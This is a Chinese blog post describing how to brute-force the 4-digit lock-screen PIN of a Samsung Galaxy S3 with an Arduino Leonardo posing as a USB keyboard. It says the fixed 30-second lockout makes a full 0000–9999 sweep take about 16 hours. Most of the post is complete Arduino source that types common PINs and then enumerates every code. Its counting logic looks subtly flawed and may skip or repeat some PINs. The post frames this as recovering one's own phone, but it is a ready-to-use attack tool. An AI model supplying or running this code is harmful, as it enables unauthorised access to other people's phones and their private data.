@plantpark
2014-08-14T13:54:04.000000Z
字数 3517
阅读 4407
通过arduino暴力破解Android手机
未分类
使用过安卓手机的小伙伴们肯定会有些惨痛经历,经常会忘记手机解锁图形和PIN码,但如果通过Root等方式破解手机恐怕再也无法得到官方保修,这里就介绍一种方法安全的破解它!
三星Galaxy S3手机在输错5次PIN码后,会要求等待30s然后重新输入,幸运的是,每次输错都会要求等待30s,这等待时间并不会更改,这就给了hack的机会。
因为Arduino Leonardo可以作为HID设备模拟键盘通过USB OTG连接到手机,在这里我就选用了Leonardo,文章末尾有详细的代码。为了减少破解时间,可以把自己常用的密码或者数字组合优先测试。
当然,三星Galaxy S3手机的PIN码只有四位,如果从0000一直尝试到9999大概只需要16个小时,如果你的手机碰巧是小米手机,PIN码又碰巧设了17位,那你就果断Root吧~~
/*Brute forcing Android 4 Digit PIN'sTo run the whole range it will take upwards of 16 hours because ofthe 30 second delay after 5 bad inputsIntrestingly, if the target phone has the pattern enabledand the backup PIN set, the backup PIN entry system doesn't force the 30 second delay afterinvalid attemptshttp://blog.infosecsee.com */const int buttonPin = 2; // input pin for pushbuttonint previousButtonState = HIGH; // for checking the state of a pushButtonint counter = 0; // button push counterint check = 0;void setup() {pinMode(buttonPin, INPUT);Keyboard.begin();}void loop() {int buttonState = digitalRead(buttonPin);if ((buttonState != previousButtonState) && (buttonState == HIGH)) {Mouse.move(25, 50, 0);String three = "000";String two = "00";String one = "0";while(counter < 10000){delay(1000);while (check < 1){Keyboard.println("1234");delay(500);Keyboard.println("1111");delay(500);Keyboard.println("0000");delay(500);Keyboard.println("1212");delay(500);Keyboard.println("7777");Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);Keyboard.println("1004");delay(500);Keyboard.println("2000");delay(500);Keyboard.println("4444");delay(500);Keyboard.println("2222");delay(500);Keyboard.println("6969");Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);Mouse.move(25, 50, 0);Keyboard.println("9999");delay(500);Keyboard.println("3333");delay(500);Keyboard.println("5555");delay(500);Keyboard.println("6666");delay(500);Keyboard.println("1122");Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);Keyboard.println("1313");delay(500);Keyboard.println("8888");delay(500);Keyboard.println("4321");delay(500);Keyboard.println("2001");delay(500);Keyboard.println("1010");delay(500);Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);check++;}if (counter < 10 && check == 1) {Keyboard.println(three + counter);delay(500);counter++;Keyboard.println(three + counter);delay(500);counter++;Keyboard.println(three + counter);delay(500);counter++;Keyboard.println(three + counter);delay(500);counter++;Keyboard.println(three + counter);delay(500);Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);}else if (counter < 100){Keyboard.println(two + counter);delay(500);counter++;Keyboard.println(two + counter);delay(500);counter++;Keyboard.println(two + counter);delay(500);counter++;Keyboard.println(two + counter);delay(500);counter++;Keyboard.println(two + counter);delay(500);Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);}else if (counter < 1000){Keyboard.println(one + counter);delay(500);counter++;Keyboard.println(one + counter);delay(500);counter++;Keyboard.println(one + counter);delay(500);counter++;Keyboard.println(one + counter);delay(500);counter++;Keyboard.println(one + counter);delay(500);Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);}else {Keyboard.println(counter);delay(500);counter++;Keyboard.println(counter);delay(500);counter++;Keyboard.println(counter);delay(500);counter++;Keyboard.println(counter);delay(500);counter++;Keyboard.println(counter);delay(500);Keyboard.println("");Keyboard.println("");delay(30000);Mouse.move(25, 50, 0);}}}previousButtonState = buttonState;}
